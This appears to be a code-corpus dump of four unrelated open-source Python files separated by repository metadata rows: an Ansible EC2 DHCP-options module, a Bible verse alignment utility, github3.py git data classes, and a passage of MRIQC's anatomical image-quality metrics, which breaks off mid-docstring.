from ansible.module_utils.ec2 import ansible_dict_to_boto3_filter_list, get_aws_connection_info
from ansible.module_utils.ec2 import camel_dict_to_snake_dict, boto3_tag_list_to_ansible_dict
try:
import botocore
except ImportError:
pass # caught by imported HAS_BOTO3
def get_dhcp_options_info(dhcp_option):
dhcp_option_info = {'DhcpOptionsId': dhcp_option['DhcpOptionsId'],
'DhcpConfigurations': dhcp_option['DhcpConfigurations'],
'Tags': boto3_tag_list_to_ansible_dict(dhcp_option['Tags'])}
return dhcp_option_info
def list_dhcp_options(client, module):
params = dict(Filters=ansible_dict_to_boto3_filter_list(module.params.get('filters')))
if module.params.get("dry_run"):
params['DryRun'] = True
if module.params.get("dhcp_options_ids"):
params['DhcpOptionsIds'] = module.params.get("dhcp_options_ids")
try:
all_dhcp_options = client.describe_dhcp_options(**params)
except botocore.exceptions.ClientError as e:
module.fail_json(msg=str(e), exception=traceback.format_exc(),
**camel_dict_to_snake_dict(e.response))
results = [camel_dict_to_snake_dict(get_dhcp_options_info(option))
for option in all_dhcp_options['DhcpOptions']]
module.exit_json(dhcp_options=results)
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(
dict(
filters=dict(type='dict', default={}),
dry_run=dict(type='bool', default=False, aliases=['DryRun']),
dhcp_options_ids=dict(type='list', aliases=['DhcpOptionIds'])
)
)
module = AnsibleModule(argument_spec=argument_spec,
supports_check_mode=True)
# Validate Requirements
if not HAS_BOTO3:
module.fail_json(msg='boto3 and botocore are required.')
try:
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module, boto3=True)
connection = boto3_conn(module, conn_type='client', resource='ec2', region=region, endpoint=ec2_url, **aws_connect_kwargs)
except botocore.exceptions.NoCredentialsError as e:
module.fail_json(msg="Can't authorize connection - " + str(e))
# call your function here
results = list_dhcp_options(connection, module)
module.exit_json(result=results)
if __name__ == '__main__':
main()
| gpl-3.0 | -3,786,381,632,088,776,700 | 3,469,813,789,491,895,300 | 31.227848 | 130 | 0.684014 | false |
refstudycentre/versification | util.py | 1 | 11774 |
import numpy as np
import unicodecsv
import codecs
import goslate
import sqlite3
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import linear_kernel
def imp_load(filename):
texts = []
books = []
chapters = []
verses = []
# Read in a whole bible
with codecs.open(filename,encoding='utf-8') as f:
bibletext = f.read()
# Split by verse
bible_verses = bibletext.split('$$$')
# Process verses
for verse in bible_verses:
try:
verse = verse.split('\n',1)
ref = verse[0].strip()
text = verse[1].strip()
ref = ref.split('.')
book = ref[0].strip()
cnum = ref[1].strip()
vnum = ref[2].strip()
texts.append(text)
books.append(book)
chapters.append(cnum)
verses.append(vnum)
except IndexError:
pass
return books, chapters, verses, texts
def calculate_similarity(texts, translations):
# Train the tf-idf thingy on the translated texts
tfidf = TfidfVectorizer().fit_transform(texts)
# Build a matrix representation of the similarities between verses
# This will yield a simmetrical matrix
# TODO: For performance and logical reasons: Only calculate similarity for nearby verses, assume others 0 ?
M = np.array([linear_kernel(tfidf[j:j+1], tfidf).flatten() for j in range(len(texts))])
# Hack(ish): Set similarity with verses of same translation to 0
for i in range(len(M)):
for j in range(i+1):
if translations[i] == translations[j]:
M[i][j] = M[j][i] = 0
# print np.round(M*100,0)
return M
def find_best_couple(M,t):
"""
find best couple in similarity matrix M
the translation(s) of each verse is given in t
"""
# assume values are 0 for verses in same translation
i_max, j_max = np.unravel_index(M.argmax(), M.shape)
P_max = M[i_max, j_max]
return i_max, j_max, P_max
def merge_nodes(M,a,b):
"""
merge indices a and b in similarity matrix M into one supernode,
averaging similarity values between the supernode and other verses
"""
N = len(M)
# calculate a new row (and column) for the supernode
supernode_similarity = [np.average([M[k][a],M[k][b]]) for k in range(N)]
# append the row (this will jumble the verse order...)
newM = np.append(M, np.array(supernode_similarity)[None,:], axis=0)
# append 0 (supernode's similarity with itself) to the row and add it as a column
supernode_similarity.append(0.)
newM = np.append(newM, np.array(supernode_similarity)[:,None], axis=1)
# to preserve verse indices, don't delete
# newM = np.delete(newM,[a,b],axis=0)
# rather make rows a and b 0
# to preserve verse indices, don't delete
# newM = np.delete(newM,[a,b],axis=1)
# rather make columns a and b 0
newM[:,a] = np.zeros_like(newM[:,a])
newM[:,b] = np.zeros_like(newM[:,b])
newM[a,:] = np.zeros_like(newM[a,:])
newM[b,:] = np.zeros_like(newM[b,:])
return newM
def group_verses(M, t, numT, P_min = 0.1):
"""
Automatically group verses
t = the translation of each verse
numT = max number of verses in a group = number of translations
"""
t = [[val] for val in t]
N = len(M)
groups = {} # keyed by supernode index
iteration = 0
max_iteration = N
while iteration < max_iteration:
iteration += 1
#print "\t\tGrouping: iteration ",iteration
i,j,P = find_best_couple(M, t)
#print "\t\tbest couple: ",i,j,P
# Stop iterating if similarity gets too low...
if P < P_min:
break;
group = []
# merge supernodes if they exist, else merge nodes:
if i in groups:
group.extend(groups[i])
else:
group.append(i)
if j in groups:
group.extend(groups[j])
else:
group.append(j)
# group now contains all of the verses for the new supernode
if len(group) > numT:
# this grouping is invalid
# prevent it from happening again by making P 0
M[i][j] = 0
else:
# valid grouping. save it.
# Remove the previous supernode groups
if i in groups:
del groups[i]
if j in groups:
del groups[j]
# Create the supernode
M = merge_nodes(M,i,j)
t.append(t[i] + t[j])
# Save the index of the new supernode
supernode_index = len(M)-1
groups[supernode_index] = group
print "\r\t\t",len(groups),
print
return groups
def align(input_translations, input_filenames, output_filename):
"""
Load one csv file for each translation
Group, align and sort the verses
Export a csv file containing a column for each translation
"""
if len(input_translations) != len(input_filenames):
raise ValueError("Number of translations and number of files must be the same")
M = len(input_translations)
# Load pre-translated data
print "\tLoading data from files..."
#translations,books,chapters,verses,texts_original,texts_en = load_translated_verses(input_translations, input_filenames)
translations,chapters,verses,texts_original,texts_en = csv_import_translated_books(input_filenames, input_translations)
# Calculate similarity between verses
print "\tCalculating similarity matrix..."
similarity = calculate_similarity(texts_en, translations)
def canonical_group_cmp(a, b):
"""
Define sort order for groups of verses
"""
# find two verses from the same translation to compare their canonical order
for i in a:
for j in b:
if translations[i] == translations[j]:
return i - j
# Group the verses
print "\tGrouping verses..."
groups = group_verses(similarity, translations, 3).values()
# print groups
# Put groups back into canonical order
print "\tSorting verses..."
groups.sort(canonical_group_cmp)
# prepare data for csv export
print "\tPreparing csv data..."
csv_rows = []
csv_rows.append(input_translations) # headers
for group in groups:
# create a row in the csv file for every group
if len(group) == M:
# rows where all translations are present, are quick:
group.sort()
row = [u"{0}:{1}:{2}".format(chapters[verse],verses[verse],texts_original[verse]) for verse in group]
else:
# for other rows, we have to find the missing translation, and substitute it with a blank
row = []
for translation in input_translations:
found = False
for verse in group:
if translation == translations[verse]:
# verse found for this translation
row.append(u"{0}:{1}:{2}".format(chapters[verse],verses[verse],texts_original[verse]))
found = True
break
if not found:
# fill in a blank
row.append("")
csv_rows.append(row)
# print csv_rows
# Export to csv file
print "\tWriting csv file..."
with open(output_filename,'wb') as f:
cw = unicodecsv.writer(f, encoding='utf-8')
cw.writerows(csv_rows)
print "\tDone!"
def translate_csv(in_filename, language, out_filename):
"""
Load a bible book from csv file
translate it
save it as a new file
"""
# Create a translator object
gs = goslate.Goslate(retry_times=100, timeout=100)
# Load the bible book to be translated
chapters,verses,texts_original = csv_import_book(in_filename)
# Batch translate the verses if necessary
if language != 'en':
print "Batch translating {0} verses from '{1}' to 'en'".format(len(texts_original), language)
texts_translated = gs.translate(texts_original, 'en', language)
else:
print "Not translating {0} verses already in 'en'".format(len(texts_original))
texts_translated = texts_original
# Write to CSV file
rows = zip(chapters, verses, texts_original, texts_translated)
with open(out_filename,'wb') as f:
cw = unicodecsv.writer(f, encoding='utf-8')
cw.writerow(['chapter','verse','text_original','text_english'])
cw.writerows(rows)
def csv_import_book(filename):
"""
load bible book from csv file
"""
texts = []
chapters = []
verses = []
# Read in a whole file of verses
with open(filename,'rb') as f:
cr = unicodecsv.reader(f, encoding='utf-8')
header = cr.next() # skip header
# Process verses
for cnum,vnum,text in cr:
chapters.append(int(cnum)) # parse integer
verses.append(int(vnum)) # parse integer
texts.append(text.strip()) # remove surrounding whitespace
# return results
return chapters,verses,texts
def csv_export_book(filename, rows=[], chapters=[], verses=[], texts=[]):
if not len(rows) > 0:
rows = zip(chapters, verses, texts)
with open(filename,'wb') as f:
cw = unicodecsv.writer(f,encoding='utf-8')
cw.writerow(['chapter','verse','text'])
cw.writerows(rows)
def csv_import_translated_book(input_file):
"""
import a single translated book from a single translation from single csv file
"""
texts_en = []
texts_original = []
chapters = []
verses = []
# Read in a whole (Google translated) file of verses
with open(input_file, 'rb') as f:
cr = unicodecsv.reader(f, encoding='utf-8')
header = cr.next() # skip header
# Process verses
for cnum,vnum,text_original,text_en in cr:
chapters.append(int(cnum))
verses.append(int(vnum))
texts_original.append(text_original.strip())
texts_en.append(text_en.strip())
# return results
return chapters,verses,texts_original,texts_en
def csv_import_translated_books(input_files, input_translations):
"""
import a single book from M translations from M csv files
"""
if len(input_files) != len(input_translations):
raise ValueError("Number of input files and translations are not the same")
translations = []
chapters = []
verses = []
texts_original = []
texts_en = []
for in_file,translation in zip(input_files,input_translations):
c,v,o,e = csv_import_translated_book(in_file)
chapters.extend(c)
verses.extend(v)
texts_original.extend(o)
texts_en.extend(e)
translations.extend([translation]*len(e))
return translations,chapters,verses,texts_original,texts_en
def csv_import_aligned_book(input_file):
"""
Import a single aligned book (e.g. after it is checked by humans)
"""
groups = []
with open(input_file, 'rb') as f:
cr = unicodecsv.reader(f, encoding='utf-8')
translations = cr.next() # header contains translation names
for row in cr:
group = {}
for i in range(len(translations)):
verse = row[i].split(':',3)
group[translations[i]] = {
'chapternum':int(verse[0]),
'versenum':int(verse[1]),
'text':verse[2].strip()
}
groups.append(group)
return groups | gpl-2.0 | 1,165,888,309,220,726,800 | 2,789,997,109,960,634,000 | 28.14604 | 125 | 0.590029 | false |
msabramo/github3.py | github3/git.py | 5 | 6891 | # -*- coding: utf-8 -*-
"""
github3.git
===========
This module contains all the classes relating to Git Data.
See also: http://developer.github.com/v3/git/
"""
from __future__ import unicode_literals
from json import dumps
from base64 import b64decode
from .models import GitHubObject, GitHubCore, BaseCommit
from .users import User
from .decorators import requires_auth
class Blob(GitHubObject):
"""The :class:`Blob <Blob>` object.
See also: http://developer.github.com/v3/git/blobs/
"""
def __init__(self, blob):
super(Blob, self).__init__(blob)
self._api = blob.get('url', '')
#: Raw content of the blob.
self.content = blob.get('content').encode()
#: Encoding of the raw content.
self.encoding = blob.get('encoding')
#: Decoded content of the blob.
self.decoded = self.content
if self.encoding == 'base64':
self.decoded = b64decode(self.content)
#: Size of the blob in bytes
self.size = blob.get('size')
#: SHA1 of the blob
self.sha = blob.get('sha')
def _repr(self):
return '<Blob [{0:.10}]>'.format(self.sha)
class GitData(GitHubCore):
"""The :class:`GitData <GitData>` object. This isn't directly returned to
the user (developer) ever. This is used to prevent duplication of some
common items among other Git Data objects.
"""
def __init__(self, data, session=None):
super(GitData, self).__init__(data, session)
#: SHA of the object
self.sha = data.get('sha')
self._api = data.get('url', '')
class Commit(BaseCommit):
"""The :class:`Commit <Commit>` object. This represents a commit made in a
repository.
See also: http://developer.github.com/v3/git/commits/
"""
def __init__(self, commit, session=None):
super(Commit, self).__init__(commit, session)
#: dict containing at least the name, email and date the commit was
#: created
self.author = commit.get('author', {}) or {}
# If GH returns nil/None then make sure author is a dict
self._author_name = self.author.get('name', '')
#: dict containing similar information to the author attribute
self.committer = commit.get('committer', {}) or {}
# blank the data if GH returns no data
self._commit_name = self.committer.get('name', '')
#: :class:`Tree <Tree>` the commit belongs to.
self.tree = None
if commit.get('tree'):
self.tree = Tree(commit.get('tree'), self._session)
def _repr(self):
return '<Commit [{0}:{1}]>'.format(self._author_name, self.sha)
def author_as_User(self):
"""Attempt to return the author attribute as a
:class:`User <github3.users.User>`. No guarantees are made about the
validity of this object, i.e., having a login or created_at object.
"""
return User(self.author, self._session)
def committer_as_User(self):
"""Attempt to return the committer attribute as a
:class:`User <github3.users.User>` object. No guarantees are made
about the validity of this object.
"""
return User(self.committer, self._session)
class Reference(GitHubCore):
"""The :class:`Reference <Reference>` object. This represents a reference
created on a repository.
See also: http://developer.github.com/v3/git/refs/
"""
def __init__(self, ref, session=None):
super(Reference, self).__init__(ref, session)
self._api = ref.get('url', '')
#: The reference path, e.g., refs/heads/sc/featureA
self.ref = ref.get('ref')
#: :class:`GitObject <GitObject>` the reference points to
self.object = GitObject(ref.get('object', {}))
def _repr(self):
return '<Reference [{0}]>'.format(self.ref)
def _update_(self, ref):
self.__init__(ref, self._session)
@requires_auth
def delete(self):
"""Delete this reference.
:returns: bool
"""
return self._boolean(self._delete(self._api), 204, 404)
@requires_auth
def update(self, sha, force=False):
"""Update this reference.
:param str sha: (required), sha of the reference
:param bool force: (optional), force the update or not
:returns: bool
"""
data = {'sha': sha, 'force': force}
json = self._json(self._patch(self._api, data=dumps(data)), 200)
if json:
self._update_(json)
return True
return False
class GitObject(GitData):
"""The :class:`GitObject <GitObject>` object."""
def __init__(self, obj):
super(GitObject, self).__init__(obj, None)
#: The type of object.
self.type = obj.get('type')
def _repr(self):
return '<Git Object [{0}]>'.format(self.sha)
class Tag(GitData):
"""The :class:`Tag <Tag>` object.
See also: http://developer.github.com/v3/git/tags/
"""
def __init__(self, tag):
super(Tag, self).__init__(tag, None)
#: String of the tag
self.tag = tag.get('tag')
#: Commit message for the tag
self.message = tag.get('message')
#: dict containing the name and email of the person
self.tagger = tag.get('tagger')
#: :class:`GitObject <GitObject>` for the tag
self.object = GitObject(tag.get('object', {}))
def _repr(self):
return '<Tag [{0}]>'.format(self.tag)
class Tree(GitData):
"""The :class:`Tree <Tree>` object.
See also: http://developer.github.com/v3/git/trees/
"""
def __init__(self, tree, session=None):
super(Tree, self).__init__(tree, session)
#: list of :class:`Hash <Hash>` objects
self.tree = [Hash(t) for t in tree.get('tree', [])]
def _repr(self):
return '<Tree [{0}]>'.format(self.sha)
def recurse(self):
"""Recurse into the tree.
:returns: :class:`Tree <Tree>`
"""
json = self._json(self._get(self._api, params={'recursive': '1'}),
200)
return Tree(json, self._session) if json else None
class Hash(GitHubObject):
"""The :class:`Hash <Hash>` object.
See also: http://developer.github.com/v3/git/trees/#create-a-tree
"""
def __init__(self, info):
super(Hash, self).__init__(info)
#: Path to file
self.path = info.get('path')
#: File mode
self.mode = info.get('mode')
#: Type of hash, e.g., blob
self.type = info.get('type')
#: Size of hash
self.size = info.get('size')
#: SHA of the hash
self.sha = info.get('sha')
#: URL of this object in the GitHub API
self.url = info.get('url')
def _repr(self):
return '<Hash [{0}]>'.format(self.sha)
| bsd-3-clause | -6,592,366,404,596,228,000 | -4,702,216,686,280,666,000 | 26.564 | 78 | 0.57742 | false |
oesteban/mriqc | mriqc/qc/anatomical.py | 1 | 21553 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
# pylint: disable=no-member
r"""
Measures based on noise measurements
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
.. _iqms_cjv:
- :py:func:`~mriqc.qc.anatomical.cjv` -- **coefficient of joint variation**
(:abbr:`CJV (coefficient of joint variation)`):
The ``cjv`` of GM and WM was proposed as objective function by [Ganzetti2016]_ for
the optimization of :abbr:`INU (intensity non-uniformity)` correction algorithms.
Higher values are related to the presence of heavy head motion and large
:abbr:`INU (intensity non-uniformity)` artifacts. Lower values are better.
.. _iqms_cnr:
- :py:func:`~mriqc.qc.anatomical.cnr` -- **contrast-to-noise ratio**
(:abbr:`CNR (contrast-to-noise ratio)`): The ``cnr`` [Magnota2006]_,
is an extension of the :abbr:`SNR (signal-to-noise Ratio)` calculation
to evaluate how separated the tissue distributions of GM and WM are.
Higher values indicate better quality.
.. _iqms_snr:
- :py:func:`~mriqc.qc.anatomical.snr` -- **signal-to-noise ratio**
(:abbr:`SNR (signal-to-noise ratio)`): calculated within the
tissue mask.
.. _iqms_snrd:
- :py:func:`~mriqc.qc.anatomical.snr_dietrich`: **Dietrich's SNR**
(:abbr:`SNRd (signal-to-noise ratio, Dietrich 2007)`) as proposed
by [Dietrich2007]_, using the air background as reference.
.. _iqms_qi2:
- :py:func:`~mriqc.qc.anatomical.art_qi2`: **Mortamet's quality index 2**
(:abbr:`QI2 (quality index 2)`) is a calculation of the goodness-of-fit
of a :math:`\chi^2` distribution on the air mask,
once the artifactual intensities detected for computing
the :abbr:`QI1 (quality index 1)` index have been removed [Mortamet2009]_.
Measures based on information theory
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
.. _iqms_efc:
- :py:func:`~mriqc.qc.anatomical.efc`:
The :abbr:`EFC (Entropy Focus Criterion)`
[Atkinson1997]_ uses the Shannon entropy of voxel intensities as
an indication of ghosting and blurring induced by head motion.
Lower values are better.
The original equation is normalized by the maximum entropy, so that the
:abbr:`EFC (Entropy Focus Criterion)` can be compared across images with
different dimensions.
.. _iqms_fber:
- :py:func:`~mriqc.qc.anatomical.fber`:
The :abbr:`FBER (Foreground-Background Energy Ratio)` [Shehzad2015]_,
defined as the mean energy of image values within the head relative
to outside the head [QAP-measures]_.
Higher values are better.
Measures targeting specific artifacts
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
.. _iqms_inu:
- **inu_\*** (*nipype interface to N4ITK*): summary statistics (max, min and median)
of the :abbr:`INU (intensity non-uniformity)` field as extracted by the N4ITK algorithm
[Tustison2010]_. Values closer to 1.0 are better.
.. _iqms_qi:
- :py:func:`~mriqc.qc.anatomical.art_qi1`:
Detect artifacts in the image using the method described in [Mortamet2009]_.
The :abbr:`QI1 (quality index 1)` is the proportion of voxels with intensity
corrupted by artifacts normalized by the number of voxels in the background.
Lower values are better.
.. figure:: ../resources/mortamet-mrm2009.png
The workflow to compute the artifact detection from [Mortamet2009]_.
.. _iqms_wm2max:
- :py:func:`~mriqc.qc.anatomical.wm2max`:
The white-matter to maximum intensity ratio is the median intensity
within the WM mask over the 95% percentile of the full intensity
distribution, that captures the existence of long tails due to
hyper-intensity of the carotid vessels and fat. Values
should be around the interval [0.6, 0.8].
Other measures
^^^^^^^^^^^^^^
.. _iqms_fwhm:
- **fwhm** (*nipype interface to AFNI*): The :abbr:`FWHM (full-width half maximum)` of
the spatial distribution of the image intensity values in units of voxels [Forman1995]_.
Lower values are better. Uses the gaussian width estimator filter implemented in
AFNI's ``3dFWHMx``:
.. math ::
\text{FWHM} = \sqrt{-{\left[4 \ln{(1-\frac{\sigma^2_{X^m_{i+1,j}-X^m_{i,j}}}
{2\sigma^2_{X^m_{i,j}}}})\right]}^{-1}}
.. _iqms_icvs:
- :py:func:`~mriqc.qc.anatomical.volume_fraction` (**icvs_\***):
the
:abbr:`ICV (intracranial volume)` fractions of :abbr:`CSF (cerebrospinal fluid)`,
:abbr:`GM (gray-matter)` and :abbr:`WM (white-matter)`. They should move within
a normative range.
.. _iqms_rpve:
- :py:func:`~mriqc.qc.anatomical.rpve` (**rpve_\***): the
:abbr:`rPVe (residual partial voluming error)` of :abbr:`CSF (cerebrospinal fluid)`,
:abbr:`GM (gray-matter)` and :abbr:`WM (white-matter)`. Lower values are better.
.. _iqms_summary:
- :py:func:`~mriqc.qc.anatomical.summary_stats` (**summary_\*_\***):
Mean, standard deviation, 5% percentile and 95% percentile of the distribution
of background, :abbr:`CSF (cerebrospinal fluid)`, :abbr:`GM (gray-matter)` and
:abbr:`WM (white-matter)`.
.. _iqms_tpm:
- **overlap_\*_\***:
The overlap of the :abbr:`TPMs (tissue probability maps)` estimated from the image and
the corresponding maps from the ICBM nonlinear-asymmetric 2009c template.
.. math ::
\text{JI}^k = \frac{\sum_i \min{(\text{TPM}^k_i, \text{MNI}^k_i)}}
{\sum_i \max{(\text{TPM}^k_i, \text{MNI}^k_i)}}
.. topic:: References
.. [Dietrich2007] Dietrich et al., *Measurement of SNRs in MR images: influence
of multichannel coils, parallel imaging and reconstruction filters*, JMRI 26(2):375--385.
2007. doi:`10.1002/jmri.20969 <http://dx.doi.org/10.1002/jmri.20969>`_.
.. [Ganzetti2016] Ganzetti et al., *Intensity inhomogeneity correction of structural MR images:
a data-driven approach to define input algorithm parameters*. Front Neuroinform 10:10. 2016.
doi:`10.3389/finf.201600010 <http://dx.doi.org/10.3389/finf.201600010>`_.
.. [Magnota2006] Magnotta, VA., & Friedman, L., *Measurement of signal-to-noise
and contrast-to-noise in the fBIRN multicenter imaging study*.
J Dig Imag 19(2):140-147, 2006. doi:`10.1007/s10278-006-0264-x
<http://dx.doi.org/10.1007/s10278-006-0264-x>`_.
.. [Mortamet2009] Mortamet B et al., *Automatic quality assessment in
structural brain magnetic resonance imaging*, Mag Res Med 62(2):365-372,
2009. doi:`10.1002/mrm.21992 <http://dx.doi.org/10.1002/mrm.21992>`_.
.. [Tustison2010] Tustison NJ et al., *N4ITK: improved N3 bias correction*,
IEEE Trans Med Imag, 29(6):1310-20,
2010. doi:`10.1109/TMI.2010.2046908 <http://dx.doi.org/10.1109/TMI.2010.2046908>`_.
.. [Shehzad2015] Shehzad Z et al., *The Preprocessed Connectomes Project
Quality Assessment Protocol - a resource for measuring the quality of MRI data*,
Front. Neurosci. Conference Abstract: Neuroinformatics 2015.
doi:`10.3389/conf.fnins.2015.91.00047 <https://doi.org/10.3389/conf.fnins.2015.91.00047>`_.
.. [Forman1995] Forman SD et al., *Improved assessment of significant activation in functional
magnetic resonance imaging (fMRI): use of a cluster-size threshold*,
Magn. Reson. Med. 33 (5), 636–647, 1995.
doi:`10.1002/mrm.1910330508 <https://doi.org/10.1002/mrm.1910330508>`_.
mriqc.qc.anatomical module
^^^^^^^^^^^^^^^^^^^^^^^^^^
"""
import os.path as op
from sys import version_info
from math import pi, sqrt
import numpy as np
import scipy.ndimage as nd
from scipy.stats import kurtosis # pylint: disable=E0611
from io import open # pylint: disable=W0622
from builtins import zip, range # pylint: disable=W0622
from six import string_types
DIETRICH_FACTOR = 1.0 / sqrt(2 / (4 - pi))
FSL_FAST_LABELS = {'csf': 1, 'gm': 2, 'wm': 3, 'bg': 0}
PY3 = version_info[0] > 2
def snr(mu_fg, sigma_fg, n):
r"""
Calculate the :abbr:`SNR (Signal-to-Noise Ratio)`.
The estimation may be provided with only one foreground region in
which the noise is computed as follows:
.. math::
\text{SNR} = \frac{\mu_F}{\sigma_F\sqrt{n/(n-1)}},
where :math:`\mu_F` is the mean intensity of the foreground and
:math:`\sigma_F` is the standard deviation of the same region.
:param float mu_fg: mean of foreground.
:param float sigma_fg: standard deviation of foreground.
:param int n: number of voxels in foreground mask.
:return: the computed SNR
"""
return float(mu_fg / (sigma_fg * sqrt(n / (n - 1))))
def snr_dietrich(mu_fg, sigma_air):
r"""
Calculate the :abbr:`SNR (Signal-to-Noise Ratio)`.
This must be an air mask around the head, and it should not contain artifacts.
The computation is done following the eq. A.12 of [Dietrich2007]_, which
includes a correction factor in the estimation of the standard deviation of
air and its Rayleigh distribution:
.. math::
\text{SNR} = \frac{\mu_F}{\sqrt{\frac{2}{4-\pi}}\,\sigma_\text{air}}.
:param float mu_fg: mean of foreground.
:param float sigma_air: standard deviation of the air surrounding the head ("hat" mask).
:return: the computed SNR for the foreground segmentation
"""
if sigma_air < 1.0:
from .. import MRIQC_LOG
MRIQC_LOG.warning('SNRd - background sigma is too small (%f)', sigma_air)
sigma_air += 1.0
return float(DIETRICH_FACTOR * mu_fg / sigma_air)
def cnr(mu_wm, mu_gm, sigma_air):
r"""
Calculate the :abbr:`CNR (Contrast-to-Noise Ratio)` [Magnota2006]_.
Higher values are better.
.. math::
\text{CNR} = \frac{|\mu_\text{GM} - \mu_\text{WM} |}{\sqrt{\sigma_B^2 +
\sigma_\text{WM}^2 + \sigma_\text{GM}^2}},
where :math:`\sigma_B` is the standard deviation of the noise distribution within
the air (background) mask.
:param float mu_wm: mean of signal within white-matter mask.
:param float mu_gm: mean of signal within gray-matter mask.
:param float sigma_air: standard deviation of the air surrounding the head ("hat" mask).
:return: the computed CNR
"""
return float(abs(mu_wm - mu_gm) / sigma_air)
def cjv(mu_wm, mu_gm, sigma_wm, sigma_gm):
r"""
Calculate the :abbr:`CJV (coefficient of joint variation)`, a measure
related to :abbr:`SNR (Signal-to-Noise Ratio)` and
:abbr:`CNR (Contrast-to-Noise Ratio)` that is presented as a proxy for
the :abbr:`INU (intensity non-uniformity)` artifact [Ganzetti2016]_.
Lower is better.
.. math::
\text{CJV} = \frac{\sigma_\text{WM} + \sigma_\text{GM}}{|\mu_\text{WM} - \mu_\text{GM}|}.
:param float mu_wm: mean of signal within white-matter mask.
:param float mu_gm: mean of signal within gray-matter mask.
:param float sigma_wm: standard deviation of signal within white-matter mask.
:param float sigma_gm: standard deviation of signal within gray-matter mask.
:return: the computed CJV
"""
return float((sigma_wm + sigma_gm) / abs(mu_wm - mu_gm))
def fber(img, headmask, rotmask=None):
r"""
Calculate the :abbr:`FBER (Foreground-Background Energy Ratio)` [Shehzad2015]_,
defined as the mean energy of image values within the head relative
to outside the head. Higher values are better.
.. math::
\text{FBER} = \frac{E[|F|^2]}{E[|B|^2]}
:param numpy.ndarray img: input data
:param numpy.ndarray headmask: a mask of the head (including skull, skin, etc.)
:param numpy.ndarray rotmask: a mask of empty voxels inserted after a rotation of
data
"""
fg_mu = np.median(np.abs(img[headmask > 0]) ** 2)
airmask = np.ones_like(headmask, dtype=np.uint8)
airmask[headmask > 0] = 0
if rotmask is not None:
airmask[rotmask > 0] = 0
bg_mu = np.median(np.abs(img[airmask == 1]) ** 2)
if bg_mu < 1.0e-3:
return 0
return float(fg_mu / bg_mu)
def efc(img, framemask=None):
r"""
Calculate the :abbr:`EFC (Entropy Focus Criterion)` [Atkinson1997]_.
Uses the Shannon entropy of voxel intensities as an indication of ghosting
and blurring induced by head motion. A range of low values is better,
with EFC = 0 for all the energy concentrated in one pixel.
.. math::
\text{E} = - \sum_{j=1}^N \frac{x_j}{x_\text{max}}
\ln \left[\frac{x_j}{x_\text{max}}\right]
with :math:`x_\text{max} = \sqrt{\sum_{j=1}^N x^2_j}`.
The original equation is normalized by the maximum entropy, so that the
:abbr:`EFC (Entropy Focus Criterion)` can be compared across images with
different dimensions:
.. math::
\text{EFC} = \left( \frac{N}{\sqrt{N}} \, \log{\sqrt{N}^{-1}} \right) \text{E}
:param numpy.ndarray img: input data
:param numpy.ndarray framemask: a mask of empty voxels inserted after a rotation of
data
"""
if framemask is None:
framemask = np.zeros_like(img, dtype=np.uint8)
n_vox = np.sum(1 - framemask)
# Calculate the maximum value of the EFC (which occurs any time all
# voxels have the same value)
efc_max = 1.0 * n_vox * (1.0 / np.sqrt(n_vox)) * \
np.log(1.0 / np.sqrt(n_vox))
# Calculate the total image energy
b_max = np.sqrt((img[framemask == 0]**2).sum())
# Calculate EFC (add 1e-16 to the image data to keep log happy)
return float((1.0 / efc_max) * np.sum((img[framemask == 0] / b_max) * np.log(
(img[framemask == 0] + 1e-16) / b_max)))
def wm2max(img, mu_wm):
r"""
Calculate the :abbr:`WM2MAX (white-matter-to-max ratio)`,
defined as the maximum intensity found in the volume w.r.t. the
mean value of the white matter tissue. Values close to 1.0 are
better:
.. math ::
\text{WM2MAX} = \frac{\mu_\text{WM}}{P_{99.95}(X)}
"""
return float(mu_wm / np.percentile(img.reshape(-1), 99.95))
def art_qi1(airmask, artmask):
r"""
Detect artifacts in the image using the method described in [Mortamet2009]_.
Caculates :math:`\text{QI}_1`, as the proportion of voxels with intensity
corrupted by artifacts normalized by the number of voxels in the background:
.. math ::
\text{QI}_1 = \frac{1}{N} \sum\limits_{x\in X_\text{art}} 1
Lower values are better.
:param numpy.ndarray airmask: input air mask, without artifacts
:param numpy.ndarray artmask: input artifacts mask
"""
# Count the number of voxels that remain after the opening operation.
# These are artifacts.
return float(artmask.sum() / (airmask.sum() + artmask.sum()))
def art_qi2(img, airmask, min_voxels=int(1e3), max_voxels=int(3e5), save_plot=True):
r"""
Calculates :math:`\text{QI}_2`, based on the goodness-of-fit of a centered
:math:`\chi^2` distribution onto the intensity distribution of
non-artifactual background (within the "hat" mask):
.. math ::
\chi^2_n = \frac{2}{(\sigma \sqrt{2})^{2n} \, (n - 1)!}x^{2n - 1}\, e^{-\frac{x}{2}}
where :math:`n` is the number of coil elements.
:param numpy.ndarray img: input data
:param numpy.ndarray airmask: input air mask without artifacts
"""
from sklearn.neighbors import KernelDensity
from scipy.stats import chi2
from mriqc.viz.misc import plot_qi2
# S. Ogawa was born
np.random.seed(1191935)
data = img[airmask > 0]
data = data[data > 0]
# Write out figure of the fitting
out_file = op.abspath('error.svg')
with open(out_file, 'w') as ofh:
ofh.write('<p>Background noise fitting could not be plotted.</p>')
if len(data) < min_voxels:
return 0.0, out_file
modelx = data if len(data) < max_voxels else np.random.choice(
data, size=max_voxels)
x_grid = np.linspace(0.0, np.percentile(data, 99), 1000)
# Estimate data pdf with KDE on a random subsample
kde_skl = KernelDensity(bandwidth=0.05 * np.percentile(data, 98),
kernel='gaussian').fit(modelx[:, np.newaxis])
kde = np.exp(kde_skl.score_samples(x_grid[:, np.newaxis]))
# Find cutoff
kdethi = np.argmax(kde[::-1] > kde.max() * 0.5)
# Fit X^2
param = chi2.fit(modelx[modelx < np.percentile(data, 95)], 32)
chi_pdf = chi2.pdf(x_grid, *param[:-2], loc=param[-2], scale=param[-1])
# Compute goodness-of-fit (gof)
gof = float(np.abs(kde[-kdethi:] - chi_pdf[-kdethi:]).mean())
if save_plot:
out_file = plot_qi2(x_grid, kde, chi_pdf, modelx, kdethi)
return gof, out_file
def volume_fraction(pvms):
r"""
Computes the :abbr:`ICV (intracranial volume)` fractions
